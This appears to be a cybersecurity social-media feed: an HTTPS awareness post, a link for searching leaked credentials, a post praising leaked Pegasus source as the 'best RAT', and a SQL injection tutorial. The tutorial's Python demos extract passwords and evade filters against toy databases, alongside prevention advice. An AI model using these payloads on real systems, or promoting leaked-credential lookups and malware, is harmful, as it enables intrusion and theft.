28/03/2025
⚠️ Stay Safe Online! The Difference Between HTTP & HTTPS 🔒
Ever wondered why some websites start with HTTP while others have HTTPS? This simple difference can impact your online security in a BIG way!
📌 HTTP (HyperText Transfer Protocol):
Data is sent without encryption ❌
Hackers can easily intercept your passwords & personal info! 🕵️♂️💀
📌 HTTPS (HyperText Transfer Protocol Secure):
Encrypts your data using TLS (the successor to SSL) ✅
Even if hackers intercept your info, they only see random characters instead of your actual password! 🔐💡
💡 Always check for HTTPS before entering sensitive information like passwords, banking details, or personal data! A small "S" can make a HUGE difference in keeping your information safe. One caveat: HTTPS only protects your data on its way to the site. Phishing sites use HTTPS too, so also check that the domain name is the one you expect before you type anything.
🔁 Share this to spread awareness and help others stay secure online! 💙
---
Explanation of the Image:
This infographic illustrates the difference between HTTP and HTTPS with a simple example:
1️⃣ The top section (HTTP) shows a user (Himani) logging into a website that uses HTTP.
Her password "abc123" is sent unencrypted over the internet.
A hacker can easily read the password in plain text.
2️⃣ The bottom section (HTTPS) features another user (Gaurav) using HTTPS.
His password is encrypted before being transmitted.
Even if a hacker intercepts the data, they will only see random, unreadable characters instead of the actual password.
Conclusion: Always use websites with HTTPS for secure transactions and data protection! 🚀
26/04/2024
Leaked passwords database search tool
Search 3.2 billion leaked credentials by:
- email
- nickname
- password
(you can also try searching by mobile number, as some people use it as a password)
https://proxynova.com/tools/comb/
25/04/2024
Pegasus source code has been leaked, and it's by far the best RAT available on the internet, with many unique features.
24/04/2024
💰Bug Hunting Methodology 🔥
Follow us: Astra
18/04/2024
🌐Top 30 Cybersecurity Search Engines
18/04/2024
What Are The Advantages Of A
15/04/2024
⚠️SQL INJECTION:
🔥Objectives:
- SQL Injection Concepts
- Types of SQL Injection
- SQL Injection Methodology
- SQL Injection Tools
- Evasion Techniques
- SQL Injection Countermeasures
SQL Injection Concepts
A SQL injection attack targets websites and web applications that build database queries from user input. It relies on strategically injecting SQL fragments into existing queries through that input, so that the application's own query does something the developer never intended: revealing or manipulating the data stored in the tables of the database. SQL injection is a powerful and dangerous attack because the flaw it exploits lives in the application's code, not in the database engine. The fundamental concept is to inject commands that reveal sensitive information from the database (or modify it, or, on badly configured servers, execute commands on the host); hence it can result in a high-profile breach.
Types of SQL Injection
💫🔥SQL Injections can be classified into three major categories:
In-band SQLi
Inferential SQLi
Out-of-band SQLi
💫🔥In-band SQL Injection
In-band SQL Injection includes injection techniques that use the same communication channel to launch an injection attack and to gather information from the response. In-band injection techniques include:
💫🔥 Error-based SQL Injection. Error-based SQL injection is an in-band technique that relies on the error messages returned by the database server to reveal information about the structure of the database (and, on some engines, the data itself, by forcing a value into a failing type conversion so it is echoed in the error). It is very useful for an attacker to enumerate an entire database. Detailed error messages help during development to troubleshoot issues, but they should be replaced with generic messages when the application goes live, with the details logged server-side only. Error-based SQL injection can be performed using the following techniques:
💫🔥 Union-based SQL Injection. Union-based SQL injection is another in-band technique that uses the UNION SQL operator to combine the results of two or more SELECT statements into a single result set. The application then renders the rows of the attacker's SELECT as if they were the output of its own query. The injected SELECT must return the same number of columns as the original (and compatible types on strict engines), which the attacker usually determines first with ORDER BY n or UNION SELECT NULL,NULL,... probes.
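Worked example of both in-band techniques, added here and not part of the original post. It uses Python's built-in sqlite3 module with a constructed two-table database (products, which the search page is meant to query, and users, which it is not); the application code, the table and column names and the credentials are all assumptions made for the demonstration. The vulnerable search concatenates the term into the query: a stray quote produces a database error (the error-based probe), a UNION payload with the right column count lifts every username and password onto the product page, and the same payload against the parameterized version returns nothing.

```python
import sqlite3

# Constructed sample database (not from the original post): products is what the
# search feature is meant to query; users is a table the attacker should never see.
def build_db():
    db = sqlite3.connect(":memory:")
    db.executescript("""
        CREATE TABLE products (id INTEGER PRIMARY KEY, name TEXT, price REAL);
        INSERT INTO products VALUES (1, 'Keyboard', 25.0), (2, 'Mouse', 15.0);
        CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, password TEXT);
        INSERT INTO users VALUES (1, 'admin', 'S3cret!'), (2, 'himani', 'abc123');
    """)
    return db

def search_products_vulnerable(db, term):
    """Query built by string concatenation: whatever the user types becomes SQL."""
    sql = "SELECT name, price FROM products WHERE name LIKE '%" + term + "%'"
    return db.execute(sql).fetchall()

def search_products_safe(db, term):
    """Same search with a bound parameter: the term is data, never SQL."""
    sql = "SELECT name, price FROM products WHERE name LIKE ?"
    return db.execute(sql, ("%" + term + "%",)).fetchall()

def error_probe(db, term):
    """Error-based probing: return the database's error text, or None if no error.

    A single quote breaks the quoting in the vulnerable query. A verbose error
    confirms the injection point and, on engines with chattier messages, can
    leak the query text, table names or even data.
    """
    try:
        search_products_vulnerable(db, term)
        return None
    except sqlite3.Error as exc:
        return str(exc)

def extract_users_via_union(db):
    """Union-based extraction: append a second SELECT with the same number of
    columns (2) so its rows are rendered by the product-search page.
    The trailing -- comments out the remainder of the original query."""
    payload = "' UNION SELECT username, password FROM users--"
    rows = search_products_vulnerable(db, payload)
    # Real product rows carry a REAL price; the injected rows carry a TEXT
    # password in that column, which is how the attacker tells them apart.
    return sorted((u, p) for u, p in rows if isinstance(p, str))

if __name__ == "__main__":
    db = build_db()
    print("probe with a quote :", error_probe(db, "'"))
    print("union extraction   :", extract_users_via_union(db))
    print("same payload, safe :",
          search_products_safe(db, "' UNION SELECT username, password FROM users--"))
```

Run it as a script to see the three outcomes side by side; the only difference between the vulnerable and the safe search is that the safe one passes the term as a parameter instead of splicing it into the SQL text.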
💫🔥Inferential SQL Injection (Blind Injection)
In inferential SQL injection the application does not return the results of the injected query to the attacker at all. These are referred to as blind injections because the attacker cannot see the output of the attack; they can only observe a side effect of it (a difference in page content, a status code, or the response time) and infer one bit of information per request. The two types of inferential SQL injection are:
💫🔥 Boolean-based Blind SQL Injection
Time-based Blind SQL Injection.
Boolean exploitation technique. The attacker injects a condition into a request, for example AND substr(password,1,1)='a'. The response contains no database data, only the difference between a true and a false outcome: the page renders normally, or it does not. By comparing the HTTP responses, the attacker learns whether the condition held and reconstructs data one character (or one bit) at a time. Time-based blind injection applies the same idea where the response does not change at all: the injected condition triggers a delay only when it is true (MySQL SLEEP(), SQL Server WAITFOR DELAY, PostgreSQL pg_sleep()), and the attacker measures the response time instead of reading the page.
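Worked example of Boolean-based blind extraction, added here and not part of the original post (Python with sqlite3; the login form, the users table and the stored password are constructed assumptions). The application returns only a yes/no login result, yet because the username is concatenated into the query, each request answers one comparison about the admin password, and a binary search over the character's code point recovers each character in about seven requests. SQLite has no sleep function, so the time-based variant is not shown; it would use the same ask() routine with a delay in place of the true/false response.

```python
import sqlite3

# Constructed sample data (not from the original post).
def build_db():
    db = sqlite3.connect(":memory:")
    db.executescript("""
        CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, password TEXT);
        INSERT INTO users VALUES (1, 'admin', 'S3cret!'), (2, 'gaurav', 'hunter2');
    """)
    return db

def login_vulnerable(db, username, password):
    """Returns only True/False (logged in or not). No data is shown, yet the
    query is built from raw input, so the boolean result becomes an oracle."""
    sql = (f"SELECT id FROM users WHERE username='{username}' "
           f"AND password='{password}'")
    return db.execute(sql).fetchone() is not None

def login_safe(db, username, password):
    """Parameterized version: the injected condition is just a strange username."""
    sql = "SELECT id FROM users WHERE username=? AND password=?"
    return db.execute(sql, (username, password)).fetchone() is not None

class BlindExtractor:
    """Recovers admin's password one yes/no question at a time."""

    def __init__(self, login):
        self.login = login      # callable(username, password) -> bool
        self.requests = 0

    def ask(self, condition):
        # admin' AND (<condition>)--   : the -- discards the password check
        self.requests += 1
        return self.login(f"admin' AND ({condition})--", "irrelevant")

    def password_length(self, max_len=64):
        lo, hi = 0, max_len     # binary search on length(password) > n
        while lo < hi:
            mid = (lo + hi) // 2
            if self.ask(f"length(password) > {mid}"):
                lo = mid + 1
            else:
                hi = mid
        return lo

    def char_at(self, pos):
        lo, hi = 0, 127         # binary search over the ASCII code point
        while lo < hi:
            mid = (lo + hi) // 2
            if self.ask(f"unicode(substr(password, {pos}, 1)) > {mid}"):
                lo = mid + 1
            else:
                hi = mid
        return chr(lo)

    def extract_password(self):
        n = self.password_length()
        return "".join(self.char_at(i) for i in range(1, n + 1))

def steal_admin_password(db, login_fn=login_vulnerable):
    """Returns (recovered password, number of login requests used)."""
    extractor = BlindExtractor(lambda u, p: login_fn(db, u, p))
    return extractor.extract_password(), extractor.requests

if __name__ == "__main__":
    db = build_db()
    print("vulnerable login:", steal_admin_password(db))
    print("safe login      :", steal_admin_password(db, login_safe))
```

Against the parameterized login every question is answered "no", so the extractor concludes the password has length zero. The request count is the practical cost of blind injection: roughly log2(range) requests per character, which is why tools such as sqlmap automate it.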
💫🔥Out-of-band SQL Injection
Out-of-band SQL injection uses a different channel to launch the injection and to receive the result, typically a DNS lookup or HTTP request that the database server itself makes to an attacker-controlled host. It depends on database features that can issue such requests (for example xp_dirtree on SQL Server or UTL_HTTP on Oracle) and on the database server being allowed outbound network access; hence it is not very common, but it is valuable when neither output nor timing differences can be observed.
SQL Injection Methodology
💫🔥Information Gathering and SQL Injection Vulnerability Detection
In the Information Gathering phase, information about the web application, Operating System, database, and the structure of the components is collected. Evaluation of the extracted information is useful for identifying vulnerabilities that can be exploited.
💫🔥Launch SQL Injection Attacks
Once information gathering has revealed the database type, the structure of the queries and the injectable parameters, the attacker selects the matching technique (union-based, error-based, blind or out-of-band) and launches the attack against the vulnerabilities found. The injection succeeds by exploiting exactly those weaknesses.
💫🔥How can SQL Injection be Prevented?
Open Worldwide Application Security Project (OWASP) SQL Injection Prevention Cheat Sheet
Use parameterized queries (prepared statements); this is the primary defence, because a bound value can never change the structure of the query
Use input validation, and use allow-lists (whitelists) of expected values rather than block-lists (blacklists) of known-bad ones
Sanitize and encode user-provided input, with database-specific escaping only as a last resort where a parameter cannot be used (for example a column name)
Use a Web Application Firewall (WAF) as defence in depth, not as a replacement for fixing the code
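Added example, not from the original post, showing how these controls fit together in Python with sqlite3 (the table, column names and data are assumptions). Values are bound as parameters; identifiers that cannot be bound (sort column, sort direction) are validated against an allow-list; numeric input is type-checked before use; and a block-list filter is included only to show the bypass that makes it unsuitable as a defence.

```python
import sqlite3

# Constructed sample data (not from the original post).
def build_db():
    db = sqlite3.connect(":memory:")
    db.executescript("""
        CREATE TABLE products (id INTEGER PRIMARY KEY, name TEXT, price REAL);
        INSERT INTO products VALUES (1, 'Keyboard', 25.0), (2, 'Mouse', 15.0),
                                    (3, 'Monitor', 120.0);
    """)
    return db

# Identifiers such as column names and the ORDER BY direction cannot be bound
# as query parameters, so they are checked against an allow-list of known-good
# values instead. Anything else is rejected outright.
ALLOWED_SORT_COLUMNS = {"name", "price"}
ALLOWED_DIRECTIONS = {"ASC", "DESC"}

def list_products(db, sort_col="name", direction="asc", max_price=None):
    if sort_col not in ALLOWED_SORT_COLUMNS:
        raise ValueError(f"unknown sort column: {sort_col!r}")
    direction = direction.upper()
    if direction not in ALLOWED_DIRECTIONS:
        raise ValueError(f"bad sort direction: {direction!r}")
    sql = "SELECT name, price FROM products"
    params = []
    if max_price is not None:
        # Value: enforce the type first (float() rejects "1 OR 1=1"), then bind.
        sql += " WHERE price <= ?"
        params.append(float(max_price))
    # Interpolating here is safe only because both tokens come from our own sets.
    sql += f" ORDER BY {sort_col} {direction}"
    return db.execute(sql, params).fetchall()

def get_product(db, raw_id):
    """Type-safe lookup: reject anything that is not an integer, then bind it."""
    try:
        product_id = int(raw_id)
    except (TypeError, ValueError):
        raise ValueError(f"product id must be an integer, got {raw_id!r}")
    return db.execute("SELECT name, price FROM products WHERE id = ?",
                      (product_id,)).fetchone()

def blocklist_filter(value):
    """The approach to avoid: stripping known-bad words. Included only to show
    why block-lists fail: removing a word once can assemble it from its halves."""
    for bad in ("UNION", "SELECT", "--"):
        value = value.replace(bad, "")
    return value

def is_rejected(fn, *args):
    """True if fn(*args) refuses the input with ValueError."""
    try:
        fn(*args)
    except ValueError:
        return True
    return False

if __name__ == "__main__":
    db = build_db()
    print(list_products(db, "price", "desc", max_price="30"))
    print(is_rejected(list_products, db, "price; DROP TABLE products", "asc"))
    print(blocklist_filter("UNIUNIONON SELSELECTECT"))   # the filter rebuilds the keywords
```

The block-list call shows the classic failure: "UNIUNIONON" survives a single pass of stripping "UNION" as exactly "UNION" (and a lower-case payload is not touched at all), whereas the allow-list has nothing to strip and nothing to get wrong.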
💫🔥Evasion Techniques
To secure a database, it is recommended that it is deployed in an isolated, secure network segment monitored by an Intrusion Detection System (IDS). The IDS continually inspects network and host traffic to the database application and matches it against signatures of known attacks. To reach the database, the attacker therefore has to craft payloads that do not match those signatures; the following evasion techniques are used for that purpose.
💫🔥Types of Signature Evasion Techniques:
Inserting inline comments between keywords
Character encoding
String concatenation
Code obfuscation
Whitespace manipulation
Hex encoding
Sophisticated matches (conditions that are logically equivalent to the textbook tautology but do not look like it)
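Added example, not from the original post, of why signature evasion works: a naive regex filter written for the textbook payloads (an assumption standing in for an IDS or WAF rule set) is run against one payload per technique, and each payload that passes the filter is executed against a constructed SQLite database to confirm that it still extracts the admin password. The table names, the data and the filter rules are all assumptions.

```python
import re
import sqlite3

# Constructed sample data (not from the original post).
def build_db():
    db = sqlite3.connect(":memory:")
    db.executescript("""
        CREATE TABLE products (id INTEGER PRIMARY KEY, name TEXT);
        INSERT INTO products VALUES (1, 'Keyboard'), (2, 'Mouse');
        CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, password TEXT);
        INSERT INTO users VALUES (1, 'admin', 'S3cret!');
    """)
    return db

# A naive signature filter of the kind a home-grown WAF rule set might use:
# it matches the textbook payloads exactly as they appear in tutorials.
SIGNATURES = [
    r"union\s+select",   # keyword pair separated by whitespace
    r"or\s+1\s*=\s*1",   # the classic tautology
    r"--",               # line comment used to discard the query tail
    r"admin",            # the sensitive literal the attacker is after
]

def signature_blocks(term):
    return any(re.search(sig, term, re.IGNORECASE) for sig in SIGNATURES)

def search_vulnerable(db, term):
    """Injectable search: the term is concatenated straight into the query."""
    sql = "SELECT name FROM products WHERE name LIKE '%" + term + "%'"
    return {row[0] for row in db.execute(sql)}

# One payload per evasion technique. SQLite treats /* */ as whitespace and lets
# an unterminated /* run to the end of the input, which replaces the -- comment.
PAYLOADS = {
    "textbook":
        "' UNION SELECT password FROM users WHERE username='admin'--",
    "inline comments":        # UNION/**/SELECT defeats union\s+select
        "' UNION/**/SELECT password FROM users WHERE id=1/*",
    "string concatenation":   # 'ad'||'min' never contains the word admin
        "' UNION/**/SELECT password FROM users WHERE username='ad'||'min'/*",
    "hex encoding":           # X'61646D696E' is the byte string 'admin'
        "' UNION/**/SELECT password FROM users "
        "WHERE username=CAST(X'61646D696E' AS TEXT)/*",
    "tautology variant":      # 'a' LIKE 'a' is always true but is not 1=1
        "zzz' OR 'a' LIKE 'a",
}

def evaluate(db):
    """Run every payload through the filter and, if it passes, the database.
    Returns {name: (blocked, rows_returned_or_None)}."""
    results = {}
    for name, payload in PAYLOADS.items():
        if signature_blocks(payload):
            results[name] = (True, None)
        else:
            results[name] = (False, search_vulnerable(db, payload))
    return results

if __name__ == "__main__":
    for name, (blocked, rows) in evaluate(build_db()).items():
        print(f"{name:22s} blocked={blocked!s:5s} rows={rows}")
```

Only the textbook payload is caught; every variant passes the filter and still returns the admin password (or, for the tautology, every product although the search term "zzz" matches nothing). Adding more regular expressions just restarts the game, which is why the countermeasure is parameterized queries, with signature matching kept for detection and alerting rather than as the control.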
💫🔥Countermeasures
Several detection tools are available to help mitigate SQL injection. These scanners test websites and applications for injectable parameters, report the issues they find, and recommend remediation; some of the more advanced tools also give a technical description of each issue. Scanning finds the vulnerabilities; fixing the code as described in the prevention list above is what removes them.
💫🔥Other SQL Injection Countermeasures
Limit the length of user input (defence in depth only; short payloads still fit)
Use custom, generic error messages for users and log the detailed database error server-side
Monitor DB traffic using an IDS or WAF
Disable dangerous commands and extended stored procedures such as xp_cmdshell
Isolate the database server from the web server
Use the POST method for forms that carry sensitive data (GET parameters end up in browser history and server logs) and connect to the database with a low-privileged account
Run the database service account with minimal rights
Move extended stored procedures to an isolated server
Use type-safe variables or functions such as IsNumeric to enforce the expected type before a value reaches the query
Validate and sanitize all user input passed to the database, and pass it as a bound parameter rather than by string concatenation
💫🔥SQL Injection Tools
BSQL
SQLmap
SQLninja
BSQL Hacker
Marathon Tool
SQL Power Injector
Havij